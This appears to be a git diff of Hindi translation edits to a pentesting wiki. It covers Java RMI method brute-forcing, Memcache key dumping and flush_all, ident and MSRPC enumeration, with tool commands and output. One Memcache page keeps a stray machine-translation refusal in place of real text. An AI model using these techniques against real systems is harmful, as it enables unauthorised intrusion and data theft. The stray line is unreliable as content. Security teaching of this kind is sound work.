@ -56,7 +56,7 @@ iOS dll फ़ाइलें डिकंपाइल के लिए आस
### फिर से साइन करना
उपकरण [Uber APK Signer](https://github.com/patrickfav/uber-apk-signer) एक ही कुंजी के साथ कई APKs को साइन करने को सरल बनाता है, और इसे ऐप में किए गए परिवर्तनों के बाद फिर से साइन करने के लिए उपयोग किया जा सकता है।
उपकरण [Uber APK Signer](https://github.com/patrickfav/uber-apk-signer) एक ही कुंजी के साथ कई APKs को साइन करन सरल बनाता है, और इसे ऐप में किए गए परिवर्तनों के बाद फिर से साइन करने के लिए उपयोग किया जा सकता है।
## आगे की जानकारी

2
src/network-services-pentesting/10000-network-data-management-protocol-ndmp.md
View File

@ -4,7 +4,7 @@
From [Wikipedia](https://en.wikipedia.org/wiki/NDMP):
> **NDMP**, या **नेटवर्क डेटा प्रबंधन प्रोटोकॉल**, एक प्रोटोकॉल है जिसका उद्देश्य नेटवर्क अटैच्ड स्टोरेज \([NAS](https://en.wikipedia.org/wiki/Network-attached_storage)\) उपकरणों और [बैकअप](https://en.wikipedia.org/wiki/Backup) उपकरणों के बीच डेटा को परिवहन करना है। यह बैकअप सर्वर के माध्यम से डेटा को परिवहन करने की आवश्यकता को समाप्त करता है, इस प्रकार गति को बढ़ाता है और बैकअप सर्वर से लोड को हटाता है।
> **NDMP**, या **नेटवर्क डेटा प्रबंधन प्रोटोकॉल**, एक प्रोटोकॉल है जिसका उद्देश्य नेटवर्क अटैच्ड स्टोरेज \([NAS](https://en.wikipedia.org/wiki/Network-attached_storage)\) उपकरणों और [बैकअप](https://en.wikipedia.org/wiki/Backup) उपकरणों के बीच डेटा को परिवहन करना है। यह डेटा को बैकअप सर्वर के माध्यम से परिवहन करने की आवश्यकता को समाप्त करता है, इस प्रकार गति को बढ़ाता है और बैकअप सर्वर से लोड को हटाता है।
**डिफ़ॉल्ट पोर्ट:** 10000
```text

2
src/network-services-pentesting/1026-pentesting-rusersd.md
View File

@ -4,7 +4,7 @@
## Basic Information
यह प्रोटोकॉल आपको होस्ट के उपयोगकर्ता नाम प्रदान करेगा। आप इस सेवा को पोर्ट-मैपर सेवा द्वारा इस प्रकार सूचीबद्ध कर सकते हैं:
यह प्रोटोकॉल आपको होस्ट के उपयोगकर्ता नाम प्रदान करेगा। आप इस सेवा को पोर्ट-मैपर सेवा द्वारा इस तरह सूचीबद्ध कर सकते हैं:
![](<../images/image (1041).png>)

2
src/network-services-pentesting/1080-pentesting-socks.md
View File

@ -38,7 +38,7 @@ PORT STATE SERVICE
### बेसिक प्रॉक्सीचेन का उपयोग
सॉक्स प्रॉक्सी का उपयोग करने के लिए प्रॉक्सी चेन सेटअप करें
socks प्रॉक्सी का उपयोग करने के लिए प्रॉक्सी चेन सेटअप करें
```
nano /etc/proxychains4.conf
```

14
src/network-services-pentesting/1099-pentesting-java-rmi.md
View File

@ -23,11 +23,11 @@ _nmap_ कभी-कभी _SSL_ सुरक्षित _RMI_ सेवाओ
सरल शब्दों में, _Java RMI_ एक डेवलपर को नेटवर्क पर एक _Java object_ उपलब्ध कराने की अनुमति देता है। यह एक _TCP_ पोर्ट खोलता है जहाँ ग्राहक कनेक्ट कर सकते हैं और संबंधित ऑब्जेक्ट पर विधियों को कॉल कर सकते हैं। हालांकि यह सरल लगता है, _Java RMI_ को कई चुनौतियों का सामना करना पड़ता है:
1. _Java RMI_ के माध्यम से एक विधि कॉल को भेजने के लिए, ग्राहकों को IP पता, सुनने वाला पोर्ट, लागू की गई कक्षा या इंटरफ़ेस और लक्षित ऑब्जेक्ट का `ObjID` जानना आवश्यक है ( `ObjID` एक अद्वितीय और यादृच्छिक पहचानकर्ता है जो तब बनाया जाता है जब ऑब्जेक्ट नेटवर्क पर उपलब्ध कराया जाता है। यह आवश्यक है क्योंकि _Java RMI_ कई ऑब्जेक्ट्स को एक ही _TCP_ पोर्ट पर सुनने की अनुमति देता है)।
2. दूरस्थ ग्राहक प्रदर्शित ऑब्जेक्ट पर विधियों को कॉल करके सर्वर पर संसाधनों को आवंटित कर सकते हैं_Java virtual machine_ को यह ट्रैक करना होगा कि इनमें से कौन से संसाधन अभी भी उपयोग में हैं और इनमें से कौन से गार्बेज कलेक्ट किए जा सकते हैं।
2. दूरस्थ ग्राहक सर्वर पर संसाधनों को आवंटित कर सकते हैं जो प्रदर्शित ऑब्जेक्ट पर विधियों को कॉल करके। _Java virtual machine_ को यह ट्रैक करना होगा कि इनमें से कौन से संसाधन अभी भी उपयोग में हैं और इनमें से कौन से गार्बेज कलेक्ट किए जा सकते हैं।
पहली चुनौती का समाधान _RMI registry_ द्वारा किया जाता है, जो मूल रूप से _Java RMI_ के लिए एक नामकरण सेवा है। _RMI registry_ स्वयं भी एक _RMI service_ है, लेकिन लागू की गई इंटरफ़ेस और `ObjID` निश्चित और सभी _RMI_ ग्राहकों द्वारा ज्ञात होते हैं। यह _RMI_ ग्राहकों को केवल संबंधित _TCP_ पोर्ट को जानकर _RMI_ रजिस्ट्री का उपभोग करने की अनुमति देता है।
जब डेवलपर्स अपने _Java objects_ को नेटवर्क के भीतर उपलब्ध कराना चाहते हैं, तो वे आमतौर पर उन्हें एक _RMI registry_ से बांधते हैं। _registry_ ऑब्जेक्ट से कनेक्ट करने के लिए आवश्यक सभी जानकारी (IP पता, सुनने वाला पोर्ट, लागू की गई कक्षा या इंटरफ़ेस और `ObjID` मान) संग्रहीत करता है और इसे एक मानव-पठनीय नाम ( _bound name_ ) के तहत उपलब्ध कराता है। ग्राहक जो _RMI service_ का उपभोग करना चाहते हैं, वे संबंधित _bound name_ के लिए _RMI registry_ से पूछते हैं और रजिस्ट्री कनेक्ट करने के लिए सभी आवश्यक जानकारी लौटाती है। इस प्रकार, स्थिति मूल रूप से एक सामान्य _DNS_ सेवा के समान है। निम्नलिखित सूची एक छोटा उदाहरण दिखाती है:
जब डेवलपर्स अपने _Java objects_ को नेटवर्क के भीतर उपलब्ध कराना चाहते हैं, तो वे आमतौर पर उन्हें एक _RMI registry_ से बांधते हैं। _registry_ ऑब्जेक्ट से कनेक्ट करने के लिए आवश्यक सभी जानकारी (IP पता, सुनने वाला पोर्ट, लागू की गई कक्षा या इंटरफ़ेस और `ObjID` मान) को संग्रहीत करता है और इसे एक मानव-पठनीय नाम ( _bound name_ ) के तहत उपलब्ध कराता है। ग्राहक जो _RMI service_ का उपभोग करना चाहते हैं, वे संबंधित _bound name_ के लिए _RMI registry_ से पूछते हैं और रजिस्ट्री कनेक्ट करने के लिए सभी आवश्यक जानकारी लौटाती है। इस प्रकार, स्थिति मूल रूप से एक सामान्य _DNS_ सेवा के समान है। निम्नलिखित सूची एक छोटा उदाहरण दिखाती है:
```java
import java.rmi.registry.Registry;
import java.rmi.registry.LocateRegistry;
@ -51,7 +51,7 @@ e.printStackTrace();
}
}
```
उपरोक्त उल्लेखित चुनौतियों में से दूसरी को _Distributed Garbage Collector_ (_DGC_) द्वारा हल किया गया है। यह एक और _RMI service_ है जिसमें एक ज्ञात `ObjID` मान है और यह मूल रूप से प्रत्येक _RMI endpoint_ पर उपलब्ध है। जब एक _RMI client_ एक _RMI service_ का उपयोग करना शुरू करता है, तो यह _DGC_ को जानकारी भेजता है कि संबंधित _remote object_ का उपयोग किया जा रहा है। _DGC_ फिर संदर्भ गणना को ट्रैक कर सकता है और अप्रयुक्त वस्तुओं को साफ करने में सक्षम है।
उपरोक्त उल्लेखित चुनौतियों में से दूसरी को _Distributed Garbage Collector_ (_DGC_) द्वारा हल किया गया है। यह एक और _RMI service_ है जिसमें एक ज्ञात `ObjID` मान है और यह मूल रूप से प्रत्येक _RMI endpoint_ पर उपलब्ध है। जब एक _RMI client_ एक _RMI service_ का उपयोग करना शुरू करता है, तो यह _DGC_ को सूचित करता है कि संबंधित _remote object_ का उपयोग किया जा रहा है। _DGC_ फिर संदर्भ गणना को ट्रैक कर सकता है और अप्रयुक्त वस्तुओं को साफ करने में सक्षम है।
पुराने _Activation System_ के साथ, ये _Java RMI_ के तीन डिफ़ॉल्ट घटक हैं:
@ -63,7 +63,7 @@ _Java RMI_ के डिफ़ॉल्ट घटक काफी समय स
## RMI Enumeration
[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) एक _Java RMI_ कमजोरियों का स्कैनर है जो सामान्य _RMI vulnerabilities_ी पहचान करने में सक्षम है। जब भी आप एक _RMI_ endpoint की पहचान करते हैं, तो आपको इसे आजमाना चाहिए:
[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) एक _Java RMI_ कमजोरियों का स्कैनर है जो सामान्य _RMI vulnerabilities_ो स्वचालित रूप से पहचानने में सक्षम है। जब भी आप एक _RMI_ endpoint की पहचान करते हैं, तो आपको इसे आजमाना चाहिए:
```
$ rmg enum 172.17.0.2 9010
[+] RMI registry bound names:
@ -138,9 +138,9 @@ $ rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]'
```
## दूरस्थ विधियों का ब्रूटफोर्सिंग
यहां तक कि जब enumeration के दौरान कोई कमजोरियां पहचान नहीं गई हैं, उपलब्ध _RMI_ सेवाएं अभी भी खतरनाक कार्यों को उजागर कर सकती हैं। इसके अलावा, जबकि _RMI_ संचार _RMI_ डिफ़ॉल्ट घटकों के लिए deserialization फ़िल्टर द्वारा सुरक्षित है, कस्टम _RMI_ सेवाओं से बात करते समय, ऐसे फ़िल्टर आमतौर पर मौजूद नहीं होते हैं। इसलिए, _RMI_ सेवाओं पर मान्य विधि हस्ताक्षर जानना मूल्यवान है।
यहां तक कि जब enumeration के दौरान कोई कमजोरियां पहचान नहीं गई हैं, उपलब्ध _RMI_ सेवाएं अभी भी खतरनाक कार्यों को उजागर कर सकती हैं। इसके अलावा, हालांकि _RMI_ संचार _RMI_ डिफ़ॉल्ट घटकों के लिए deserialization फ़िल्टर द्वारा सुरक्षित है, कस्टम _RMI_ सेवाओं से बात करते समय, ऐसे फ़िल्टर आमतौर पर मौजूद नहीं होते हैं। इसलिए, _RMI_ सेवाओं पर मान्य विधि हस्ताक्षर जानना मूल्यवान है।
दुर्भाग्य से, _Java RMI_ दूरस्थ वस्तुओं पर विधियों की enumeration का समर्थन नहीं करता है। यह कहा जा सकता है कि, विधि हस्ताक्षरों को [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) या [rmiscout](https://github.com/BishopFox/rmiscout) जैसे उपकरणों के साथ ब्रूटफोर्स करना संभव है:
दुर्भाग्यवश, _Java RMI_ दूरस्थ वस्तुओं पर विधियों की enumeration का समर्थन नहीं करता है। यह कहा जा सकता है कि, विधि हस्ताक्षरों को ब्रूटफोर्स करना संभव है, जैसे कि उपकरणों के साथ [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) या [rmiscout](https://github.com/BishopFox/rmiscout):
```
$ rmg guess 172.17.0.2 9010
[+] Reading method candidates from internal wordlist rmg.txt
@ -205,7 +205,7 @@ uid=0(root) gid=0(root) groups=0(root)
- [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
- [rmiscout](https://bishopfox.com/blog/rmiscout)
अनुमान लगाने के अलावा, आपको खोज इंजनों या _GitHub_ पर उस _RMI_ सेवा के इंटरफेस या यहां तक कि कार्यान्वयन की तलाश करनी चाहिए। _bound name_ और कार्यान्वित वर्ग या इंटरफेस का नाम यहां सहायक हो सकता है।
अनुमान लगाने के अलावा, आपको खोज इंजनों या _GitHub_ पर उस _RMI_ सेवा के इंटरफेस या यहां तक कि कार्यान्वयन के लिए भी देखना चाहिए। _bound name_ और कार्यान्वित वर्ग या इंटरफेस का नाम यहां सहायक हो सकता है।
## ज्ञात इंटरफेस

28
src/network-services-pentesting/11211-memcache/README.md
View File

@ -6,7 +6,7 @@
From [wikipedia](https://en.wikipedia.org/wiki/Memcached):
> **Memcached** (उच्चारण: मेम-कैश्ड, मेम-कैश-डी) एक सामान्य-उद्देश्य वितरित [memory caching](https://en.wikipedia.org/wiki/Memory_caching) प्रणाली है। इसका उपयोग अक्सर गतिशील डेटाबेस-चालित वेबसाइटों को तेज़ करने के लिए डेटा और वस्तुओं को RAM में कैश करके किया जाता है ताकि बाहरी डेटा स्रोत (जैसे डेटाबेस या API) को पढ़ने की संख्या को कम किया जा सके।
> **Memcached** (उच्चारण: मेम-कैश्ड, मेम-कैश-डी) एक सामान्य-उद्देश्य वितरित [मेमोरी कैशिंग](https://en.wikipedia.org/wiki/Memory_caching) प्रणाली है। इसका उपयोग अक्सर गतिशील डेटाबेस-चालित वेबसाइटों को तेज़ करने के लिए डेटा और वस्तुओं को RAM में कैश करके किया जाता है ताकि बाहरी डेटा स्रोत (जैसे डेटाबेस या API) को पढ़ने की संख्या को कम किया जा सके।
हालांकि Memcached SASL का समर्थन करता है, अधिकांश उदाहरण **प्रमाणीकरण के बिना उजागर** होते हैं।
@ -19,11 +19,11 @@ PORT STATE SERVICE
### Manual
एक memcache उदाहरण के अंदर सहेजे गए सभी जानकारी को निकालने के लिए आपको चाहिए:
एक memcache उदाहरण के अंदर सहेजी गई सभी जानकारी को निकालने के लिए आपको निम्नलिखित करने की आवश्यकता है:
1. **स्लैब** खोजें जिनमें **सक्रिय आइटम** है
1. **सक्रिय आइटम** के साथ **स्लैब** खोजे
2. पहले पहचाने गए स्लैब के **की नाम** प्राप्त करें
3. **की नाम** प्राप्त करके **सहेजे गए डेटा** को निकालें
3. **की नाम** प्राप्त करके **सहेजी गई डेटा** को निकालें
याद रखें कि यह सेवा केवल एक **कैश** है, इसलिए **डेटा प्रकट और गायब हो सकता है**
```bash
@ -59,7 +59,7 @@ Memcache के क्षेत्र में, एक प्रोटोकॉ
2. प्रत्येक स्लैब वर्ग के लिए एक पृष्ठ की सीमा है, जो 1MB डेटा के बराबर है।
3. यह सुविधा अनौपचारिक है और इसे किसी भी समय बंद किया जा सकता है, जैसा कि [समुदाय फोरम](https://groups.google.com/forum/?fromgroups=#!topic/memcached/1-T8I-RVGKM) में चर्चा की गई है।
संभावित गीगाबाइट डेटा में से केवल 1MB को डंप करने की सीमा विशेष रूप से महत्वपूर्ण है। हालाँकि, यह कार्यक्षमता कुंजी उपयोग पैटर्न के बारे में अंतर्दृष्टि प्रदान कर सकती है, विशिष्ट आवश्यकताओं के आधार पर। जो लोग यांत्रिकी में कम रुचि रखते हैं, उनके लिए [उपकरण अनुभाग](https://lzone.de/cheat-sheet/memcached#tools) पर जाने से व्यापक डंपिंग के लिए उपयोगिताएँ मिलती हैं। वैकल्पिक रूप से, memcached सेटअप के साथ सीधे इंटरैक्शन के लिए टेलनेट का उपयोग करने की प्रक्रिया नीचे वर्णित है।
संभावित गीगाबाइट डेटा में से केवल 1MB को डंप करने की सीमा विशेष रूप से महत्वपूर्ण है। हालाँकि, यह कार्यक्षमता कुंजी उपयोग पैटर्न के बारे में अंतर्दृष्टि प्रदान कर सकती है, विशिष्ट आवश्यकताओं के आधार पर। जो लोग यांत्रिकी में कम रुचि रखते हैं, उनके लिए [उपकरण अनुभाग](https://lzone.de/cheat-sheet/memcached#tools) पर जाने से व्यापक डंपिंग के लिए उपयोगिताएँ मिलती हैं। वैकल्पिक रूप से, memcached सेटअप के साथ सीधे इंटरैक्शन के लिए टेलनेट का उपयोग करने की प्रक्रिया नीचे दी गई है।
### **यह कैसे काम करता है**
@ -86,16 +86,16 @@ stats slabs
```
यह आउटपुट सक्रिय स्लैब प्रकार, उपयोग किए गए चंक्स और संचालनात्मक सांख्यिकी को प्रकट करता है, जो पढ़ने और लिखने के संचालन की दक्षता के बारे में जानकारी प्रदान करता है।
एक और उपयोगी कमांड, "stats items", निष्कासन, मेमोरी सीमाओं और आइटम जीवन चक्रों पर डेटा प्रदान करता है:
एक और उपयोगी कमांड, "stats items", निष्कासन, मेमोरी प्रतिबंधों और आइटम जीवनचक्रों पर डेटा प्रदान करता है:
```bash
stats items
[...]
```
ये आँकड़े एप्लिकेशन कैशिंग व्यवहार के बारे में शिक्षित अनुमानों की अनुमति देते हैं, जिसमें विभिन्न सामग्री आकारों के लिए कैश दक्षता, मेमोरी आवंटन, और बड़े ऑब्जेक्ट्स को कैश करने की क्षमता शामिल है।
ये आँकड़े एप्लिकेशन कैशिंग व्यवहार के बारे में शिक्षित अनुमान लगाने की अनुमति देते हैं, जिसमें विभिन्न सामग्री आकारों के लिए कैश दक्षता, मेमोरी आवंटन, और बड़े ऑब्जेक्ट्स को कैश करने की क्षमता शामिल है।
### **कीज़ डंप करना**
संस्करण 1.4.31 से पहले, कीज़ स्लैब क्लास द्वारा डंप की जाती हैं:
संस्करण 1.4.31 से पहले, कीज़ को स्लैब क्लास द्वारा डंप किया जाता है:
```bash
stats cachedump <slab class> <number of items to dump>
```
@ -105,11 +105,11 @@ stats cachedump 1 1000
ITEM mykey [1 b; 1350677968 s]
END
```
यह विधि स्लैब वर्गों पर दोहराती है, कुंजी मानों को निकालती है और वैकल्पिक रूप से डंप करती है।
यह विधि स्लैब वर्गों के माध्यम से पुनरावृत्ति करती है, कुंजी मानों को निकालती है और वैकल्पिक रूप से उन्हें डंप करती है।
### **MEMCACHE कुंजी का डंप करना (संस्करण 1.4.31+)**
### **MEMCACHE कुंजी डंप करना (संस्करण 1.4.31+)**
Memcache संस्करण 1.4.31 और उससे ऊपर, उत्पादन वातावरण में कुंजी डंप करने के लिए एक नया, सुरक्षित तरीका पेश किया गया है, जो [रिलीज नोट्स](https://github.com/memcached/memcached/wiki/ReleaseNotes1431) में विस्तृत गैर-ब्लॉकिंग मोड का उपयोग करता है। यह दृष्टिकोण व्यापक आउटपुट उत्पन्न करता है, इसलिए दक्षता के लिए 'nc' कमांड का उपयोग करने की सिफारिश की जाती है। उदाहरणों में शामिल हैं:
Memcache संस्करण 1.4.31 और उससे ऊपर, उत्पादन वातावरण में कुंजी डंप करने के लिए एक नया, सुरक्षित तरीका पेश किया गया है, जो नॉन-ब्लॉकिंग मोड का उपयोग करता है जैसा कि [रिलीज नोट्स](https://github.com/memcached/memcached/wiki/ReleaseNotes1431) में विस्तृत किया गया है। यह दृष्टिकोण व्यापक आउटपुट उत्पन्न करता है, इसलिए दक्षता के लिए 'nc' कमांड का उपयोग करने की सिफारिश की जाती है। उदाहरणों में शामिल हैं:
```bash
echo 'lru_crawler metadump all' | nc 127.0.0.1 11211 | head -1
echo 'lru_crawler metadump all' | nc 127.0.0.1 11211 | grep ee6ba58566e234ccbbce13f9a24f9a28
@ -125,17 +125,17 @@ Table [from here](https://lzone.de/blog).
| Ruby | [simple script](https://gist.github.com/1365005) | कुंजी नाम प्रिंट करता है। | | |
| Perl | [memdump](https://search.cpan.org/~dmaki/Memcached-libmemcached-0.4202/src/libmemcached/docs/memdump.pod) | CPAN मॉड्यूल में उपकरण | [Memcached-libmemcached](https://search.cpan.org/~dmaki/Memcached-libmemc) | ached/) |
| PHP | [memcache.php](http://livebookmark.net/journal/2008/05/21/memcachephp-stats-like-apcphp/) | Memcache मॉनिटरिंग GUI जो कुंजी को डंप करने की अनुमति भी देता है | | |
| libmemcached | [peep](http://blog.evanweaver.com/2009/04/20/peeping-into-memcached/) | **आपके memcached प्रक्रिया को फ्रीज कर देता है!!!** उत्पादन में इसका उपयोग करते समय सावधान रहें। फिर भी इसका उपयोग करते हुए आप 1MB सीमा को बायपास कर सकते हैं और वास्तव में **सभी** कुंजी को डंप कर सकते हैं। | | |
| libmemcached | [peep](http://blog.evanweaver.com/2009/04/20/peeping-into-memcached/) | **आपके memcached प्रक्रिया को फ्रीज कर देता है!!!** उत्पादन में इसका उपयोग करते समय सावधान रहें। फिर भी इसका उपयोग करते हुए आप 1MB सीमा को पार कर सकते हैं और वास्तव में **सभी** कुंजी को डंप कर सकते हैं। | | |
## Troubleshooting <a href="#troubleshooting" id="troubleshooting"></a>
### 1MB Data Limit <a href="#1mb-data-limit" id="1mb-data-limit"></a>
ध्यान दें कि memcached 1.4 से पहले आप 1MB से बड़े ऑब्जेक्ट्स को स्टोर नहीं कर सकते हैं क्योंकि डिफ़ॉल्ट अधिकतम स्लैब आकार यही है।
ध्यान दें कि memcached 1.4 से पहले आप 1MB से बड़े ऑब्जेक्ट्स को स्टोर नहीं कर सकते हैं क्योंकि डिफ़ॉल्ट अधिकतम स्लैब आकार है।
### Never Set a Timeout > 30 Days! <a href="#never-set-a-timeout--30-days" id="never-set-a-timeout--30-days"></a>
यदि आप एक कुंजी को एक समय सीमा के साथ “सेट” या “ऐड” करने की कोशिश करते हैं जो अधिकतम अनुमति से बड़ी है, तो आपको वह नहीं मिल सकता है जिसकी आप अपेक्षा करते हैं क्योंकि memcached तब मान को एक Unix टाइमस्टैम्प के रूप में मानता है। यदि टाइमस्टैम्प अतीत में है तो यह बिल्कुल कुछ नहीं करेगा। आपका आदेश चुपचाप विफल हो जाएगा।
यदि आप एक कुंजी को एक टाइमआउट के साथ “सेट” या “ऐड” करने की कोशिश करते हैं जो अधिकतम अनुमत से बड़ा है, तो आपको वह नहीं मिल सकता है जिसकी आप अपेक्षा करते हैं क्योंकि memcached तब मान को एक Unix टाइमस्टैम्प के रूप में मानता है। यदि टाइमस्टैम्प अतीत में है तो यह बिल्कुल कुछ नहीं करेगा। आपका आदेश चुपचाप विफल हो जाएगा।
तो यदि आप अधिकतम जीवनकाल का उपयोग करना चाहते हैं तो 2592000 निर्दिष्ट करें। उदाहरण:
```

14
src/network-services-pentesting/11211-memcache/memcache-commands.md
View File

@ -9,7 +9,7 @@
समर्थित कमांड (आधिकारिक और कुछ अनौपचारिक) को [doc/protocol.txt](https://github.com/memcached/memcached/blob/master/doc/protocol.txt) दस्तावेज़ में दस्तावेजीकृत किया गया है।
दुर्भाग्य से, वाक्यविन्यास विवरण वास्तव में स्पष्ट नहीं है और मौजूदा कमांडों की सूची देने वाला एक साधारण सहायता कमांड बहुत बेहतर होगा। यहाँ उन कमांडों का अवलोकन है जो आप [source](https://github.com/memcached/memcached) में पा सकते हैं (19.08.2016 के अनुसार):
दुर्भाग्य से, वाक्य रचना का विवरण वास्तव में स्पष्ट नहीं है और मौजूदा कमांडों की सूची देने वाला एक साधारण सहायता कमांड बहुत बेहतर होगा। यहाँ उन कमांडों का अवलोकन है जो आप [source](https://github.com/memcached/memcached) में पा सकते हैं (19.08.2016 के अनुसार):
| Command | Description | Example |
| -------------------- | --------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------- |
@ -22,9 +22,9 @@
| incr | दिए गए संख्या से संख्यात्मक कुंजी मान को बढ़ाता है | `incr mykey 2` |
| decr | दिए गए संख्या से संख्यात्मक कुंजी मान को घटाता है | `decr mykey 5` |
| delete | एक मौजूदा कुंजी को हटाता है | `delete mykey` |
| flush_all | तुरंत सभी आइटमों को अमान्य करता है | `flush_all` |
| flush_all | n सेकंड में सभी आइटमों को अमान्य करता है | `flush_all 900` |
| stats | सामान्य सांख्यिकी प्रिंट करता है | `stats` |
| flush_all | तुरंत सभी आइटमों को अमान्य करता है | `flush_all` |
| flush_all | n सेकंड में सभी आइटमों को अमान्य करता है | `flush_all 900` |
| stats | सामान्य सांख्यिकी प्रिंट करता है | `stats` |
| | मेमोरी सांख्यिकी प्रिंट करता है | `stats slabs` |
| | उच्च स्तर के आवंटन सांख्यिकी प्रिंट करता है | `stats malloc` |
| | आइटमों पर जानकारी प्रिंट करता है | `stats items` |
@ -34,7 +34,7 @@
| lru_crawler metadump | कैश में (सभी) आइटमों के लिए (अधिकतर) मेटाडेटा डंप करता है | `lru_crawler metadump all` |
| version | सर्वर संस्करण प्रिंट करता है | `version` |
| verbosity | लॉग स्तर बढ़ाता है | `verbosity` |
| quit | सत्र समाप्त करता है | `quit` |
| quit | सत्र समाप्त करता है | `quit` |
#### Traffic Statistics <a href="#traffic-statistics" id="traffic-statistics"></a>
@ -76,7 +76,7 @@ END
```
stats slabs
```
I'm sorry, but I cannot provide an example output without the specific content you would like translated. Please provide the text you want translated, and I will assist you accordingly.
I'm sorry, but I cannot provide an example output without the specific text you would like translated. Please provide the text you want translated to Hindi.
```
STAT 1:chunk_size 80
STAT 1:chunks_per_page 13107
@ -115,6 +115,6 @@ STAT items:2:age 1405
[...]
END
```
यह कम से कम यह देखने में मदद करता है कि क्या कोई कुंजी उपयोग की जा रही है। एक PHP स्क्रिप्ट से कुंजी नामों को डंप करने के लिए जो पहले से ही memcache एक्सेस करता है, आप [100days.de](http://100days.de/serendipity/archives/55-Dumping-MemcacheD-Content-Keys-with-PHP.html) से PHP कोड का उपयोग कर सकते हैं।
यह कम से कम यह देखने में मदद करता है कि क्या कोई कुंजी उपयोग की गई है। एक PHP स्क्रिप्ट से कुंजी नामों को डंप करने के लिए जो पहले से ही memcache एक्सेस करता है, आप [100days.de](http://100days.de/serendipity/archives/55-Dumping-MemcacheD-Content-Keys-with-PHP.html) से PHP कोड का उपयोग कर सकते हैं।
{{#include ../../banners/hacktricks-training.md}}

4
src/network-services-pentesting/113-pentesting-ident.md
View File

@ -15,13 +15,13 @@ PORT STATE SERVICE
```
## **Enumeration**
### **Manual - उपयोगकर्ता प्राप्त करें/सेवा की पहचान करें**
### **Manual - Get user/Identify the service**
यदि एक मशीन सेवा ident और samba (445) चला रही है और आप पोर्ट 43218 का उपयोग करके samba से जुड़े हैं। आप यह जान सकते हैं कि कौन सा उपयोगकर्ता samba सेवा चला रहा है:
![](<../images/image (843).png>)
यदि आप सेवा से जुड़े रहने पर केवल एंटर दबाते हैं:
यदि आप सेवा से कनेक्ट करते समय केवल एंटर दबाते हैं:
![](<../images/image (159).png>)

10
src/network-services-pentesting/135-pentesting-msrpc.md
View File

@ -6,19 +6,19 @@
Microsoft Remote Procedure Call (MSRPC) प्रोटोकॉल, एक क्लाइंट-सरवर मॉडल जो एक प्रोग्राम को किसी अन्य कंप्यूटर पर स्थित प्रोग्राम से सेवा का अनुरोध करने की अनुमति देता है बिना नेटवर्क की विशिष्टताओं को समझे, मूल रूप से ओपन-सोर्स सॉफ़्टवेयर से व्युत्पन्न किया गया था और बाद में Microsoft द्वारा विकसित और कॉपीराइट किया गया।
RPC एंडपॉइंट मैपर को TCP और UDP पोर्ट 135, SMB पर TCP 139 और 445 (एक शून्य या प्रमाणित सत्र के साथ), और TCP पोर्ट 593 पर एक वेब सेवा के रूप में एक्सेस किया जा सकता है।
RPC एंडपॉइंट मैपर को TCP और UDP पोर्ट 135, SMB पर TCP 139 और 445 (एक शून्य या प्रमाणित सत्र के साथ) के माध्यम से, और TCP पोर्ट 593 पर एक वेब सेवा के रूप में एक्सेस किया जा सकता है।
```
135/tcp open msrpc Microsoft Windows RPC
```
## MSRPC कैसे काम करता है?
क्लाइंट एप्लिकेशन द्वारा शुरू किया गया, MSRPC प्रक्रिया एक स्थानीय स्टब प्रक्रिया को कॉल करने में शामिल होती है जो फिर क्लाइंट रनटाइम लाइब्रेरी के साथ इंटरैक्ट करती है ताकि सर्वर को अनुरोध तैयार और भेजा जा सके। इसमें पैरामीटर को एक मानक नेटवर्क डेटा प्रतिनिधित्व प्रारूप में परिवर्तित करना शामिल है। यदि सर्वर दूरस्थ है, तो परिवहन प्रोटोकॉल का चयन रनटाइम लाइब्रेरी द्वारा किया जाता है, यह सुनिश्चित करते हुए कि RPC नेटवर्क स्टैक के माध्यम से वितरित किया गया है।
क्लाइंट एप्लिकेशन द्वारा शुरू किया गया, MSRPC प्रक्रिया एक स्थानीय स्टब प्रक्रिया को कॉल करने में शामिल होती है जो फिर क्लाइंट रनटाइम लाइब्रेरी के साथ इंटरैक्ट करती है ताकि सर्वर को अनुरोध तैयार और भेजा जा सके। इसमें मानक नेटवर्क डेटा प्रतिनिधित्व प्रारूप में पैरामीटर को परिवर्तित करना शामिल है। यदि सर्वर दूरस्थ है, तो परिवहन प्रोटोकॉल का चयन रनटाइम लाइब्रेरी द्वारा किया जाता है, यह सुनिश्चित करते हुए कि RPC नेटवर्क स्टैक के माध्यम से वितरित किया गया है।
![https://0xffsec.com/handbook/images/msrpc.png](https://0xffsec.com/handbook/images/msrpc.png)
## **प्रदर्शित RPC सेवाओं की पहचान करना**
## **खुले RPC सेवाओं की पहचान करना**
TCP, UDP, HTTP, और SMB के माध्यम से RPC सेवाओं का प्रदर्शन RPC लोकेटर सेवा और व्यक्तिगत एंडपॉइंट्स को क्वेरी करके निर्धारित किया जा सकता है। rpcdump जैसे उपकरण अद्वितीय RPC सेवाओं की पहचान करने में मदद करते हैं, जिन्हें **IFID** मानों द्वारा दर्शाया जाता है, सेवा विवरण और संचार बाइंडिंग को प्रकट करते हैं:
TCP, UDP, HTTP, और SMB के माध्यम से RPC सेवाओं का खुलासा RPC लोकेटर सेवा और व्यक्तिगत एंडपॉइंट्स को क्वेरी करके निर्धारित किया जा सकता है। rpcdump जैसे उपकरण अद्वितीय RPC सेवाओं की पहचान करने में मदद करते हैं, जिन्हें **IFID** मानों द्वारा दर्शाया जाता है, सेवा विवरण और संचार बाइंडिंग को प्रकट करते हैं:
```
D:\rpctools> rpcdump [-p port] <IP>
**IFID**: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
@ -81,7 +81,7 @@ rpcdump.py <IP> -p 135
## पोर्ट 593
[rpctools](https://resources.oreilly.com/examples/9780596510305/tree/master/tools/rpctools) से **rpcdump.exe** इस पोर्ट के साथ इंटरैक्ट कर सकता है।
[rpcdump.exe](https://resources.oreilly.com/examples/9780596510305/tree/master/tools/rpctools) [rpctools](https://resources.oreilly.com/examples/9780596510305/tree/master/tools/rpctools) के माध्यम से इस पोर्ट के साथ इंटरैक्ट कर सकता है।
## संदर्भ

Some files were not shown because too many files have changed in this diff Show More